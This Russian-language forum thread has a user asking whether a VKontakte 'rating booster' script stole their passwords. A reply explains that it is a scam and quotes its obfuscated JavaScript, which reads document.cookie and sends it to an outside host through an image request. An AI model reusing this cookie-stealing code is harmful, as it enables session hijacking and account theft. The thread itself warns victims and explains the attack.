Может ли скрипт украсть пароли?
Слакомился на новую замануху для контакта, здесь лежыт скрипт по словам коотрый поднимает рейтинг яeee.html, запустил, прошло 30 сек, выскокла картинка что чтото делается. Пропала. Все ничего больше не произошло. Мог ли быть новый спсоб красть пароли? К контакту пароль не жалко но к остальним сервисам пароли не хотелось бы раздавать. Мог ли етот скрипт украсть какие нибуть пароли? |
Я понял что лохотрон, но интерисует, украли они у меня пароль от контакта или все куки?
|
Ахтунг!!!
Скрипт уводит кукисы от вконтакта автору!!! С кукисами авторизации можно зайти без пароля!!!
Срочно меняй пароль. И желательно убрать ссылку из поста...
Для общего развития: http://ru.wikipedia.org/wiki/Межсайтовый_скриптинг
вот код, который уводит кукисы
Код:
img=new Image();
dc="d"+"c"+"="+"d"+"o"+"c"+"u"+"m"+"e"+"n"+"t"+"."+"c"+"o"+"o"+"k"+"i"+"e";
eval(dc);
img.src="h"+"t"+"t"+"p"+":"+"/"+"/"+"v"+"k"+"o"+"n"+"t"+"a"+"k"+"t"+"e"+"-"+"s"+"c"+"."+"h"+"u"+"t"+"."+"r"+"u"+"/"+"s"+"."+"p"+"h"+"p"+"?"+dc;
как видно, по адресу "vkontakte-sc.hut.ru/s.php?кукисы" грузится псевдо-картинка, являющаяся скриптом - сборщиком кукисов... |
Цитата:
Цитата rel
Слакомился на новую замануху для контакта, здесь лежыт скрипт по словам коотрый поднимает рейтинг »
|
Всегда будут те, кто думают, что ХАЛЯВА всё таки ещё существует...за всё надо платить ;) |
Цитата:
Цитата DedAlex
Цитата rel:Но только от контакта? »
Да. »
|
Думаю вы не юноша двенадцати лет, и должны понимать "что такое хорошо и что такое плохо" |
Время: 19:30.
© OSzone.net 2001-
